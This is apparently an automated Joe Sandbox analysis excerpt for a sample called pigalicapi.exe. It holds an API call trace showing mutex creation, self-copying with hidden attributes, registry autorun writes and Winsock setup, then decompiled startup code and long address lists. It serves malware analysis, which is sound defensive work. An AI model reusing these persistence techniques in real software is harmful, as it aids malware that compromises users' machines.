                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E6060: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 024E6082
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5E00: CreateMutexA.KERNEL32(00000000,00000000,pigalicapi,?,024E3BEB), ref: 024E5E0C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5E00: GetLastError.KERNEL32(?,024E3BEB), ref: 024E5E12
                                                                                                                                                                                                                                                                                                        • StrStrIA.SHLWAPI(C:\Users\user\pigalicapi.exe,svchost.exe), ref: 024E3BFA
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E1120: lstrlenA.KERNEL32(00000000), ref: 024E1148
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E1120: lstrlenA.KERNEL32(00000000), ref: 024E115A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E1120: GetAllUsersProfileDirectoryA.USERENV(?,00000104), ref: 024E1182
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E1120: wnsprintfA.SHLWAPI ref: 024E11BD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E1120: lstrcmpiA.KERNEL32(00000104,?), ref: 024E11D1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E1120: CopyFileA.KERNEL32(00000104,?,00000000), ref: 024E11F0
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E1120: SetFileAttributesA.KERNEL32(?,00000006), ref: 024E11FF
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E1120: lstrcpyA.KERNEL32(00000104,?), ref: 024E1210
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E1120: lstrcpyA.KERNEL32(00000000,?), ref: 024E1249
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E1120: lstrcpyA.KERNEL32(-00000208,00000000), ref: 024E125D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E1120: CreateThread.KERNEL32 ref: 024E1274
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5E30: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 024E5E7E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5E30: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 024E5EB2
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5E30: RegDeleteValueA.ADVAPI32(00000000,?), ref: 024E5ED6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5E30: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 024E5F0B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5E30: RegCloseKey.KERNEL32(00000000), ref: 024E5F19
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E6CF0: RegOpenKeyExA.KERNEL32(80000001,024F3B88,00000000,000F003F,00000000), ref: 024E6D30
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E6CF0: RegQueryValueExA.KERNEL32(00000000,024F3FA6,00000000,00000003,?,00000020), ref: 024E6D61
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E6CF0: RegDeleteValueA.ADVAPI32(00000000,024F3FA6), ref: 024E6D7E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E6CF0: RegCloseKey.ADVAPI32(00000000), ref: 024E6D88
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5F30: lstrcpyA.KERNEL32(?,pigalicapi), ref: 024E5F67
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5F30: lstrcatA.KERNEL32(?,024F3FE2), ref: 024E5F7A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5F30: RegOpenKeyExA.KERNEL32(80000001,024E3C58,00000000,000F003F,00000000), ref: 024E5FB3
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5F30: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 024E5FF2
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5F30: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 024E603B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E5F30: RegCloseKey.KERNEL32(00000000), ref: 024E6045
                                                                                                                                                                                                                                                                                                        • WSAStartup.WS2_32(00000202,?), ref: 024E3C85
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E4020: InitializeCriticalSection.KERNEL32(?), ref: 024E4066
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E4020: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 024E407A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E4020: EnterCriticalSection.KERNEL32(?,?), ref: 024E40AF
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E4020: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 024E40C6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E4020: TerminateThread.KERNEL32(00000000,00000000), ref: 024E40E6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E4020: ResetEvent.KERNEL32(00000000), ref: 024E40F7
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E4020: LeaveCriticalSection.KERNEL32(?), ref: 024E4101
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E4020: CreateThread.KERNEL32 ref: 024E4118
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 024E3F70
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(?), ref: 024E3FF4
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: File$Createlstrcpy$Value$Closelstrlen$ModuleNameOpenVirtual$CriticalFreeProcessQuerySectionThreadToken$DeleteDirectoryEventInformationInitializeProfileSizeUserslstrcatwnsprintf$AllocAttributesChangeCharCopyCurrentEnterEqualErrorExceptionExitFilterFindHandleKnownLastLeaveMutexNotificationReadResetSleepStartupTerminateUnhandledUpperWelllstrcmpi
                                                                                                                                                                                                                                                                                                        • String ID: C:\Users\user\pigalicapi.exe$Hogerfazwafx$R+g$pigalicapi$svchost.exe
                                                                                                                                                                                                                                                                                                        • API String ID: 1389186475-402523118
                                                                                                                                                                                                                                                                                                        • Opcode ID: 77d4ab255f3ce90f5bf1c70bce828404351e212dcca690a8e3d8111d6d102290
                                                                                                                                                                                                                                                                                                        • Instruction ID: b18c6ab35e2ea4daecb3177aa7753593329833000f06519af5e63cc77cee2826
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77d4ab255f3ce90f5bf1c70bce828404351e212dcca690a8e3d8111d6d102290
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1C159B0E84365AAFF28DB64AC45BBB7BB16B44706F0404EEE34A571C1DBB04694CF52
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 44%
                                                                                                                                                                                                                                                                                                        			E00401179() {
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				signed int _v48;
                                                                                                                                                                                                                                                                                                        				void* _v52;
                                                                                                                                                                                                                                                                                                        				char _v96;
                                                                                                                                                                                                                                                                                                        				void* _v112;
                                                                                                                                                                                                                                                                                                        				void* _v113;
                                                                                                                                                                                                                                                                                                        				signed int _v116;
                                                                                                                                                                                                                                                                                                        				void* _v120;
                                                                                                                                                                                                                                                                                                        				long _v132;
                                                                                                                                                                                                                                                                                                        				void* _v136;
                                                                                                                                                                                                                                                                                                        				long _v140;
                                                                                                                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                                                                                                                        				signed int _t51;
                                                                                                                                                                                                                                                                                                        				long _t53;
                                                                                                                                                                                                                                                                                                        				signed int _t54;
                                                                                                                                                                                                                                                                                                        				signed int _t55;
                                                                                                                                                                                                                                                                                                        				signed int _t56;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t57;
                                                                                                                                                                                                                                                                                                        				_Unknown_base(*)()* _t59;
                                                                                                                                                                                                                                                                                                        				signed char* _t63;
                                                                                                                                                                                                                                                                                                        				signed int _t64;
                                                                                                                                                                                                                                                                                                        				void* _t65;
                                                                                                                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                                                                                                                        				void* _t67;
                                                                                                                                                                                                                                                                                                        				void* _t70;
                                                                                                                                                                                                                                                                                                        				long _t71;
                                                                                                                                                                                                                                                                                                        				signed int _t72;
                                                                                                                                                                                                                                                                                                        				void* _t73;
                                                                                                                                                                                                                                                                                                        				void* _t77;
                                                                                                                                                                                                                                                                                                        				signed int _t84;
                                                                                                                                                                                                                                                                                                        				signed int _t85;
                                                                                                                                                                                                                                                                                                        				long _t87;
                                                                                                                                                                                                                                                                                                        				signed int _t88;
                                                                                                                                                                                                                                                                                                        				signed int _t90;
                                                                                                                                                                                                                                                                                                        				void* _t95;
                                                                                                                                                                                                                                                                                                        				signed int _t96;
                                                                                                                                                                                                                                                                                                        				struct _STARTUPINFOA* _t97;
                                                                                                                                                                                                                                                                                                        				void* _t98;
                                                                                                                                                                                                                                                                                                        				signed int _t100;
                                                                                                                                                                                                                                                                                                        				signed int _t101;
                                                                                                                                                                                                                                                                                                        				void* _t102;
                                                                                                                                                                                                                                                                                                        				void* _t105;
                                                                                                                                                                                                                                                                                                        				signed int _t106;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t108;
                                                                                                                                                                                                                                                                                                        				void* _t109;
                                                                                                                                                                                                                                                                                                        				long _t111;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t112;
                                                                                                                                                                                                                                                                                                        				void* _t114;
                                                                                                                                                                                                                                                                                                        				void* _t115;
                                                                                                                                                                                                                                                                                                        				void* _t117;
                                                                                                                                                                                                                                                                                                        				signed int _t121;
                                                                                                                                                                                                                                                                                                        				void* _t122;
                                                                                                                                                                                                                                                                                                        				void** _t123;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                                                                                                                        					L1:
                                                                                                                                                                                                                                                                                                        					_push(_t115);
                                                                                                                                                                                                                                                                                                        					_t115 = _t117;
                                                                                                                                                                                                                                                                                                        					_push(_t102);
                                                                                                                                                                                                                                                                                                        					_push(_t108);
                                                                                                                                                                                                                                                                                                        					_t97 =  &_v96;
                                                                                                                                                                                                                                                                                                        					memset(_t97, 0, 0x11 << 2);
                                                                                                                                                                                                                                                                                                        					_t48 = E0040DB20(0x30, _t86);
                                                                                                                                                                                                                                                                                                        					_t50 =  &_v113 & 0xfffffff0;
                                                                                                                                                                                                                                                                                                        					 *_t50 = 0xcccccccc;
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t50 + 4)) = 0xcccccccc;
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t50 + 8)) = 0xcccccccc;
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t50 + 0xc)) = 0xcccccccc;
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t50 + 0x10)) = 0xcccccccc;
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t50 + 0x14)) = 0xcccccccc;
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t50 + 0x18)) = 0xcccccccc;
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t50 + 0x1c)) = 0xcccccccc;
                                                                                                                                                                                                                                                                                                        					_t121 = _t117 - 0x0000007c + 0xc - _t48 & 0xfffffff0;
                                                                                                                                                                                                                                                                                                        					_t51 =  *0x422054; // 0x1
                                                                                                                                                                                                                                                                                                        					if(_t51 != 0) {
                                                                                                                                                                                                                                                                                                        						GetStartupInfoA(_t97);
                                                                                                                                                                                                                                                                                                        						_t121 = _t121 - 4;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_t109 = InterlockedCompareExchange;
                                                                                                                                                                                                                                                                                                        					_t87 =  *( *[fs:0x18] + 4);
                                                                                                                                                                                                                                                                                                        					_t105 = Sleep;
                                                                                                                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                                                                                                                        						_t53 = InterlockedCompareExchange(0x422480, _t87, 0);
                                                                                                                                                                                                                                                                                                        						_t122 = _t121 - 0xc;
                                                                                                                                                                                                                                                                                                        						if(_t53 == 0) {
                                                                                                                                                                                                                                                                                                        							break;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						if(_t53 == _t87) {
                                                                                                                                                                                                                                                                                                        							_t54 =  *0x422484; // 0x2
                                                                                                                                                                                                                                                                                                        							_t86 = 1;
                                                                                                                                                                                                                                                                                                        							if(_t54 != 1) {
                                                                                                                                                                                                                                                                                                        								L7:
                                                                                                                                                                                                                                                                                                        								_t55 =  *0x422484; // 0x2
                                                                                                                                                                                                                                                                                                        								if(_t55 == 0) {
                                                                                                                                                                                                                                                                                                        									 *0x422484 = 1;
                                                                                                                                                                                                                                                                                                        									_v136 = 0x42c018;
                                                                                                                                                                                                                                                                                                        									_v140 = 0x42c00c;
                                                                                                                                                                                                                                                                                                        									L0040EE78();
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									 *0x422004 = 1;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_t56 =  *0x422484; // 0x2
                                                                                                                                                                                                                                                                                                        								if(_t56 == 1) {
                                                                                                                                                                                                                                                                                                        									goto L36;
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									goto L10;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								L35:
                                                                                                                                                                                                                                                                                                        								_v140 = 0x1f;
                                                                                                                                                                                                                                                                                                        								L0040EE70();
                                                                                                                                                                                                                                                                                                        								_t84 =  *0x422484; // 0x2
                                                                                                                                                                                                                                                                                                        								if(_t84 != 1) {
                                                                                                                                                                                                                                                                                                        									L10:
                                                                                                                                                                                                                                                                                                        									if(_t86 == 0) {
                                                                                                                                                                                                                                                                                                        										goto L37;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									L36:
                                                                                                                                                                                                                                                                                                        									_v136 = 0x42c008;
                                                                                                                                                                                                                                                                                                        									_v140 = 0x42c000;
                                                                                                                                                                                                                                                                                                        									L0040EE78();
                                                                                                                                                                                                                                                                                                        									 *0x422484 = 2;
                                                                                                                                                                                                                                                                                                        									if(_t86 == 0) {
                                                                                                                                                                                                                                                                                                        										L37:
                                                                                                                                                                                                                                                                                                        										InterlockedExchange(0x422480, 0);
                                                                                                                                                                                                                                                                                                        										_t122 = _t122 - 8;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							L43:
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							Sleep(0x3e8);
                                                                                                                                                                                                                                                                                                        							_t121 = _t122 - 4;
                                                                                                                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                                                                                                                        						_t57 =  *0x420a80; // 0x40ca60
                                                                                                                                                                                                                                                                                                        						if(_t57 != 0) {
                                                                                                                                                                                                                                                                                                        							_v132 = 0;
                                                                                                                                                                                                                                                                                                        							_v136 = 2;
                                                                                                                                                                                                                                                                                                        							_v140 = 0;
                                                                                                                                                                                                                                                                                                        							 *_t57();
                                                                                                                                                                                                                                                                                                        							_t122 = _t122 - 0xc; // executed
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						E0040D0C0(_t86, _t105, _t109); // executed
                                                                                                                                                                                                                                                                                                        						_v140 = E0040CC00; // executed
                                                                                                                                                                                                                                                                                                        						_t59 = SetUnhandledExceptionFilter(??); // executed
                                                                                                                                                                                                                                                                                                        						_t123 = _t122 - 4;
                                                                                                                                                                                                                                                                                                        						 *0x422064 = _t59;
                                                                                                                                                                                                                                                                                                        						 *_t123 = 0x401000;
                                                                                                                                                                                                                                                                                                        						E0040D3A0(E0040EE40());
                                                                                                                                                                                                                                                                                                        						 *0x422474 = 0x400000;
                                                                                                                                                                                                                                                                                                        						_t63 =  *_acmdln;
                                                                                                                                                                                                                                                                                                        						if(_acmdln != 0) {
                                                                                                                                                                                                                                                                                                        							_t96 = 0;
                                                                                                                                                                                                                                                                                                        							while(1) {
                                                                                                                                                                                                                                                                                                        								_t100 =  *_t63 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        								if(_t100 <= 0x20) {
                                                                                                                                                                                                                                                                                                        									goto L15;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								L20:
                                                                                                                                                                                                                                                                                                        								_t86 = _t96 ^ 0x00000001;
                                                                                                                                                                                                                                                                                                        								_t96 =  ==  ? _t96 ^ 0x00000001 : _t96;
                                                                                                                                                                                                                                                                                                        								L18:
                                                                                                                                                                                                                                                                                                        								_t63 =  &(_t63[1]);
                                                                                                                                                                                                                                                                                                        								_t100 =  *_t63 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        								if(_t100 <= 0x20) {
                                                                                                                                                                                                                                                                                                        									goto L15;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								goto L24;
                                                                                                                                                                                                                                                                                                        								L15:
                                                                                                                                                                                                                                                                                                        								if(_t100 != 0) {
                                                                                                                                                                                                                                                                                                        									if(_t96 == 0) {
                                                                                                                                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                                                                                                                                        											_t63 =  &(_t63[1]);
                                                                                                                                                                                                                                                                                                        											_t101 =  *_t63 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        											if(_t101 > 0x20) {
                                                                                                                                                                                                                                                                                                        												goto L23;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        											if(_t101 != 0) {
                                                                                                                                                                                                                                                                                                        												continue;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        											goto L23;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										_t96 = 1;
                                                                                                                                                                                                                                                                                                        										goto L18;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								L23:
                                                                                                                                                                                                                                                                                                        								 *0x422470 = _t63;
                                                                                                                                                                                                                                                                                                        								goto L24;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						L24:
                                                                                                                                                                                                                                                                                                        						_t106 =  *0x422054; // 0x1
                                                                                                                                                                                                                                                                                                        						if(_t106 != 0) {
                                                                                                                                                                                                                                                                                                        							_t81 =  !=  ? _v48 & 0x0000ffff : 0xa;
                                                                                                                                                                                                                                                                                                        							 *0x41a000 =  !=  ? _v48 & 0x0000ffff : 0xa;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_t64 =  *0x42201c; // 0x1
                                                                                                                                                                                                                                                                                                        						_v116 = _t64;
                                                                                                                                                                                                                                                                                                        						_t65 = 4 + _t64 * 4;
                                                                                                                                                                                                                                                                                                        						_v120 = _t65;
                                                                                                                                                                                                                                                                                                        						 *_t123 = _t65;
                                                                                                                                                                                                                                                                                                        						_t66 = malloc(??);
                                                                                                                                                                                                                                                                                                        						_t102 =  *0x422018; // 0xa51258
                                                                                                                                                                                                                                                                                                        						_v112 = _t66;
                                                                                                                                                                                                                                                                                                        						if(_t64 <= 0) {
                                                                                                                                                                                                                                                                                                        							_t67 = 0;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_t90 = 0;
                                                                                                                                                                                                                                                                                                        							_t114 = _t102;
                                                                                                                                                                                                                                                                                                        							do {
                                                                                                                                                                                                                                                                                                        								 *_t123 =  *(_t114 + _t90 * 4);
                                                                                                                                                                                                                                                                                                        								_t27 = strlen(??) + 1; // 0x1
                                                                                                                                                                                                                                                                                                        								_t102 = _t27;
                                                                                                                                                                                                                                                                                                        								 *_t123 = _t102;
                                                                                                                                                                                                                                                                                                        								_t77 = malloc(??);
                                                                                                                                                                                                                                                                                                        								 *(_v112 + _t90 * 4) = _t77;
                                                                                                                                                                                                                                                                                                        								_t95 =  *(_t114 + _t90 * 4);
                                                                                                                                                                                                                                                                                                        								_t90 = _t90 + 1;
                                                                                                                                                                                                                                                                                                        								_v136 = _t102;
                                                                                                                                                                                                                                                                                                        								 *_t123 = _t77;
                                                                                                                                                                                                                                                                                                        								_v140 = _t95;
                                                                                                                                                                                                                                                                                                        								memcpy(??, ??, ??);
                                                                                                                                                                                                                                                                                                        							} while (_t90 != _v116);
                                                                                                                                                                                                                                                                                                        							_t67 = _v120 - 4;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_t111 = _v112;
                                                                                                                                                                                                                                                                                                        						 *(_t111 + _t67) = 0;
                                                                                                                                                                                                                                                                                                        						 *0x422018 = _t111;
                                                                                                                                                                                                                                                                                                        						E0040D430();
                                                                                                                                                                                                                                                                                                        						_t98 =  *0x422014; // 0xa514b8
                                                                                                                                                                                                                                                                                                        						 *__imp____initenv = _t98;
                                                                                                                                                                                                                                                                                                        						_t70 =  *0x422014; // 0xa514b8
                                                                                                                                                                                                                                                                                                        						_v136 = _t70;
                                                                                                                                                                                                                                                                                                        						_t71 =  *0x422018; // 0xa51258
                                                                                                                                                                                                                                                                                                        						_v140 = _t71;
                                                                                                                                                                                                                                                                                                        						_t72 =  *0x42201c; // 0x1
                                                                                                                                                                                                                                                                                                        						 *_t123 = _t72; // executed
                                                                                                                                                                                                                                                                                                        						_t73 = E00419090();
                                                                                                                                                                                                                                                                                                        						_t112 =  *0x422008; // 0x0
                                                                                                                                                                                                                                                                                                        						 *0x42200c = _t73;
                                                                                                                                                                                                                                                                                                        						if(_t112 == 0) {
                                                                                                                                                                                                                                                                                                        							 *_t123 = _t73;
                                                                                                                                                                                                                                                                                                        							exit(??);
                                                                                                                                                                                                                                                                                                        							_t108 = _t112;
                                                                                                                                                                                                                                                                                                        							 *0x422054 = 1;
                                                                                                                                                                                                                                                                                                        							E0040D450();
                                                                                                                                                                                                                                                                                                        							_t117 = _t123 - 0xc + 0xc;
                                                                                                                                                                                                                                                                                                        							goto L1;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_t88 =  *0x422004; // 0x0
                                                                                                                                                                                                                                                                                                        						if(_t88 == 0) {
                                                                                                                                                                                                                                                                                                        							L0040EE68();
                                                                                                                                                                                                                                                                                                        							_t73 =  *0x42200c; // 0x0
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						return _t73;
                                                                                                                                                                                                                                                                                                        						goto L43;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_t85 =  *0x422484; // 0x2
                                                                                                                                                                                                                                                                                                        					_t86 = 0;
                                                                                                                                                                                                                                                                                                        					if(_t85 == 1) {
                                                                                                                                                                                                                                                                                                        						goto L35;
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						goto L7;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}





























































                                                                                                                                                                                                                                                                                                        0x00401180
                                                                                                                                                                                                                                                                                                        0x00401180
                                                                                                                                                                                                                                                                                                        0x00401180
                                                                                                                                                                                                                                                                                                        0x00401183
                                                                                                                                                                                                                                                                                                        0x0040118a
                                                                                                                                                                                                                                                                                                        0x0040118b
                                                                                                                                                                                                                                                                                                        0x0040118c
                                                                                                                                                                                                                                                                                                        0x00401195
                                                                                                                                                                                                                                                                                                        0x00401199
                                                                                                                                                                                                                                                                                                        0x004011a4
                                                                                                                                                                                                                                                                                                        0x004011a7
                                                                                                                                                                                                                                                                                                        0x004011ad
                                                                                                                                                                                                                                                                                                        0x004011b4
                                                                                                                                                                                                                                                                                                        0x004011bb
                                                                                                                                                                                                                                                                                                        0x004011c2
                                                                                                                                                                                                                                                                                                        0x004011c9
                                                                                                                                                                                                                                                                                                        0x004011d0
                                                                                                                                                                                                                                                                                                        0x004011d7
                                                                                                                                                                                                                                                                                                        0x004011de
                                                                                                                                                                                                                                                                                                        0x004011e1
                                                                                                                                                                                                                                                                                                        0x004011e8
                                                                                                                                                                                                                                                                                                        0x00401493
                                                                                                                                                                                                                                                                                                        0x00401499
                                                                                                                                                                                                                                                                                                        0x00401499
                                                                                                                                                                                                                                                                                                        0x004011f4
                                                                                                                                                                                                                                                                                                        0x004011fa
                                                                                                                                                                                                                                                                                                        0x004011fd
                                                                                                                                                                                                                                                                                                        0x00401219
                                                                                                                                                                                                                                                                                                        0x0040122c
                                                                                                                                                                                                                                                                                                        0x0040122e
                                                                                                                                                                                                                                                                                                        0x00401233
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401207
                                                                                                                                                                                                                                                                                                        0x00401420
                                                                                                                                                                                                                                                                                                        0x00401425
                                                                                                                                                                                                                                                                                                        0x0040142d
                                                                                                                                                                                                                                                                                                        0x00401245
                                                                                                                                                                                                                                                                                                        0x00401245
                                                                                                                                                                                                                                                                                                        0x0040124c
                                                                                                                                                                                                                                                                                                        0x004014a1
                                                                                                                                                                                                                                                                                                        0x004014ab
                                                                                                                                                                                                                                                                                                        0x004014b3
                                                                                                                                                                                                                                                                                                        0x004014ba
                                                                                                                                                                                                                                                                                                        0x00401252
                                                                                                                                                                                                                                                                                                        0x00401252
                                                                                                                                                                                                                                                                                                        0x00401252
                                                                                                                                                                                                                                                                                                        0x0040125c
                                                                                                                                                                                                                                                                                                        0x00401264
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401433
                                                                                                                                                                                                                                                                                                        0x00401433
                                                                                                                                                                                                                                                                                                        0x00401433
                                                                                                                                                                                                                                                                                                        0x0040143a
                                                                                                                                                                                                                                                                                                        0x0040143f
                                                                                                                                                                                                                                                                                                        0x00401447
                                                                                                                                                                                                                                                                                                        0x0040126a
                                                                                                                                                                                                                                                                                                        0x0040126c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040144d
                                                                                                                                                                                                                                                                                                        0x0040144d
                                                                                                                                                                                                                                                                                                        0x0040144d
                                                                                                                                                                                                                                                                                                        0x00401455
                                                                                                                                                                                                                                                                                                        0x0040145c
                                                                                                                                                                                                                                                                                                        0x00401463
                                                                                                                                                                                                                                                                                                        0x0040146d
                                                                                                                                                                                                                                                                                                        0x00401473
                                                                                                                                                                                                                                                                                                        0x00401482
                                                                                                                                                                                                                                                                                                        0x00401488
                                                                                                                                                                                                                                                                                                        0x00401488
                                                                                                                                                                                                                                                                                                        0x0040146d
                                                                                                                                                                                                                                                                                                        0x00401447
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040120d
                                                                                                                                                                                                                                                                                                        0x00401214
                                                                                                                                                                                                                                                                                                        0x00401216
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401216
                                                                                                                                                                                                                                                                                                        0x00401272
                                                                                                                                                                                                                                                                                                        0x00401272
                                                                                                                                                                                                                                                                                                        0x00401279
                                                                                                                                                                                                                                                                                                        0x0040127b
                                                                                                                                                                                                                                                                                                        0x00401283
                                                                                                                                                                                                                                                                                                        0x0040128b
                                                                                                                                                                                                                                                                                                        0x00401292
                                                                                                                                                                                                                                                                                                        0x00401294
                                                                                                                                                                                                                                                                                                        0x00401294
                                                                                                                                                                                                                                                                                                        0x00401297
                                                                                                                                                                                                                                                                                                        0x0040129c
                                                                                                                                                                                                                                                                                                        0x004012a3
                                                                                                                                                                                                                                                                                                        0x004012a9
                                                                                                                                                                                                                                                                                                        0x004012ac
                                                                                                                                                                                                                                                                                                        0x004012b1
